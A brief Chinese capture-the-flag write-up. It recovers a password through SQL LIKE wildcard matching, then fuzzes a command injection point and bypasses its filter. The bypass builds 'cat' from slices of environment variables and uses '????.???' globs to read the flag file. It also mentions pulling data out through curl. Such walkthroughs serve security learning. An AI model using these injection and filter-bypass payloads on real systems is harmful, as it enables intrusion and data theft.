首先就一个登陆界面。给了sql语句
//本机测试语句。。略有不同
select * from user where name like binary('test') and pass like binary('%%%%%%%%%%%%%%%%%');
这里用的是like。可以用%和_
_一位位去匹配即可得到密码
登陆后是个IP命令注入点
开始fuzz
127.0.0.1
正常
127.0.0.1'
evil input
127.0.00.1"
evil input
127.0.0.1&&
evil input
127.0.0.1 ||
evil input
127.0.0.1 ;
正常
127.0.0.1;ls
eval input
127.0.0.1;LS
正常
并且靶机通外网。虽然/被过滤了。但是?没有过滤
eval input是正则过滤。否则就是报错。
后台预期大致是curl IP这样
这里只能用大写字母。以及一些字符。。
用${PWD}配合curl。带出数据。
然后构造cat ????.???就行
PATH:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
HOME:
/home/www-data
PWD:
/var/www/html
127.0.0.1;${PATH:23:1}${PWD:2:1}${HOME:12:1} ????.???
拿到Flag